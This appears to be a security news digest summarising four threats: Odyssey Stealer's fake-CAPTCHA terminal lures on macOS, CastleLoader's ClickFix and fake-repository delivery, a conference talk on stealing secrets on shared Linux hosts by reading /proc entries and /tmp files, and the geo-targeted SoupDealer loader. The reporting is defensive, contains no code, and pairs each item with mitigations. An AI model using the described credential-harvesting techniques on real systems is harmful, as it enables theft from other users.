Odyssey Stealer Targets macOS in Sophisticated ClickFix Campaign
In August 2025, researchers at X-Labs uncovered Odyssey Stealer. This macOS-targeting malware builds upon earlier ClickFix phishing techniques to harvest cryptocurrency wallet data, browser credentials, and sensitive personal files. The campaign leverages domains that display fake CAPTCHA verification pages designed to detect the victim’s operating system. On macOS, the site instructs the user to open Terminal, paste a Base64-decoded command, and execute it—an action framed as a verification step, but which downloads and runs a highly obfuscated AppleScript from a remote server. This social engineering approach bypasses email gateways and antivirus detection by relying on user-initiated execution rather than automatic file delivery. The AppleScript then prompts for the system password under the guise of authentication, granting the malware elevated privileges to access secure areas of the OS. Once active, Odyssey Stealer searches across browsers and local directories for cryptocurrency wallet extensions, including Electrum, Exodus, Litecoin, and Wasabi, as well as stored credentials, cookies, autofill data, and documents with high-value extensions. It also targets Safari cookies, Apple Notes, and macOS Keychain entries to maximize the theft of credentials and secrets. The collected data is compressed into a ZIP archive and uploaded to the attacker-controlled C2 server, which hosts a dedicated control panel for managing the stolen information. The malware employs multiple layers of obfuscation and random string generation to evade static detection, and it removes all temporary files and directories post-exfiltration, leaving minimal forensic traces. By combining tailored OS detection, user-driven execution, and comprehensive data theft, Odyssey Stealer underscores the expanding use of ClickFix tactics beyond Windows into the macOS ecosystem, with a strong focus on cryptocurrency and financially motivated intrusions. Implement strict browser and OS hardening, block known malicious domains, and train users to avoid executing unsolicited terminal commands to mitigate ClickFix-style phishing threats.
CastleLoader Malware Expands ClickFix Campaigns Against Windows Targets
Since early 2025, the CastleLoader malware has compromised over 400 Windows devices through a blend of phishing, social engineering, and abuse of trusted platforms. Researchers at PRODAFT documented 469 confirmed infections by May 2025, noting that the loader has been used to target multiple sectors, with U.S. government entities among the most prominent victims. The infection chain typically begins with Cloudflare-themed ClickFix lures, fake browser update alerts, or malicious domains that mimic services, including Google Meet. Victims are tricked into running attacker-supplied PowerShell commands via the Windows Run dialog, bypassing email security controls and relying entirely on user action for delivery. In parallel, CastleLoader operators poison open-source software supply chains through counterfeit GitHub repositories, including fake SQL Server Management Studio libraries, to spread the malware to developer environments. Once installed, CastleLoader uses a combination of PowerShell scripts and AutoIT-compiled executables to achieve persistence, evade detection, and load tailored follow-on payloads from seven hardened command-and-control servers. These payloads include StealC, RedLine, DeerStealer, and multiple remote access tools, such as NetSupport RAT and SectopRAT, which enable credential theft, data exfiltration, and long-term access. The loader’s control panel provides attackers with granular victim telemetry, geographic targeting, anti-virtual machine checks, and the ability to chain in other loaders. Communication with C2 infrastructure is routed through compromised sites and legitimate file-sharing platforms to increase resilience and reduce takedown risk. This modular approach, combined with highly convincing phishing lures, positions CastleLoader as a durable, multi-purpose threat capable of serving as the first step in ransomware, espionage, or large-scale credential theft campaigns. To mitigate, enforce application allowlisting, monitor for abnormal PowerShell execution, and vet software sources—particularly GitHub repositories—to block CastleLoader’s phishing and supply chain delivery vectors.
Shared Linux Utilities Abused to Steal Secrets Without Exploits
At Black Hat USA 2025, security researcher Ionuț Cernica demonstrated how standard Linux tools and default configurations in multi-tenant environments can be abused to harvest sensitive data, without root access or exploiting software vulnerabilities. His research, titled “Silent Leaks: Harvesting Secrets from Shared Linux Environments,” showed that process visibility features, temporary file handling, and shared logging can inadvertently expose database credentials, API keys, session cookies, and other secrets to any local user. Using commands including ps, pgrep, and direct reads from /proc/[pid]/cmdline, an attacker can monitor running processes in real time to capture plaintext credentials passed in command-line arguments. In real-world hosting scenarios, this revealed WordPress database usernames and passwords, as well as MySQL root credentials, without generating any alerts. Cernica also demonstrated escape techniques from standard isolation measures, including CageFS and chroot jails, by leveraging privileged hosting-panel binaries and undocumented file manager commands to execute host-level actions. Shared error logs became another attack surface—LiteSpeed’s global stderr[.]log could be accessed through /proc/self/fd/2, allowing the capture of live error messages from other users, often containing bearer tokens or login data. Even without process visibility, temporary directories like /tmp provided fertile ground for credential theft, as applications briefly wrote SQL dumps, installation logs, and PHP scripts containing hardcoded admin passwords. His proof-of-concept monitoring script was able to detect and exfiltrate these files within milliseconds of their creation. To mitigate the risk, Cernica recommends isolating process views using hidepid, securing credentials in vaults rather than in command-line arguments, implementing per-user logs and temp directories, and running targeted red-team exercises to detect these “silent leaks.” The findings highlight that in shared Linux setups—whether in web hosting, educational labs, or containerized platforms—the most significant security gaps often arise not from zero-day vulnerabilities but from overlooked, trusted system functions.
SoupDealer Malware Evades Detection and Targets Turkey in Multi-Stage Attacks
The SoupDealer malware has emerged as a highly evasive threat capable of bypassing nearly all public sandboxes, antivirus tools, and even enterprise-grade EDR/XDR platforms, with only Threat[.]Zone detecting it during testing. Actively deployed in real-world attacks, the malware has impacted banks, ISPs, and mid-sized organizations, demonstrating its capability to inflict significant operational damage. Researchers traced recent campaigns to targeted phishing emails aimed at Windows systems configured for the Turkish language. These messages deliver malicious JAR files—including “TEKLIFALINACAKURUNLER[.]jar” and “FIYATTEKLIFI[.]JAR”—that initiates a three-stage loader chain. Once executed, the malware verifies the victim’s location and language settings, then proceeds only if the system is in Turkey, ensuring geo-specific targeting. Infected devices are granted full remote control via command-and-control (C2) servers accessed through the TOR network, with the malware able to spread further by sending phishing messages from the victim’s email account under C2 direction. Analysis reveals a layered loader architecture that begins with an obfuscated Java-based class loader designed to resist decompilation and static analysis. The first stage decrypts a second-stage payload using AES-ECB with a SHA-512-derived key, followed by RC4 decryption to reveal the third-stage core malware. This final stage performs extensive environmental checks—verifying system specs, detecting Windows Server, and confirming Turkish geolocation—before establishing persistence through scheduled tasks and downloading TOR to route C2 traffic through onion domains. The malware supports at least 11 direct C2 commands, enabling file management, remote command execution, screenshot capture, DDoS attacks, network worm-style propagation, and disabling Windows Defender through PowerShell. It also includes self-uninstall routines, payload download capabilities, and anti-forensics measures. SoupDealer’s success highlights the limitations of cloud-based sandboxing and reinforces the need for on-premises analysis environments configured with localized settings. To mitigate, deploy on-premises sandbox environments with regional network egress, enhance phishing defenses, and monitor for unusual TOR activity or unauthorized scheduled tasks to detect and contain SoupDealer infections.
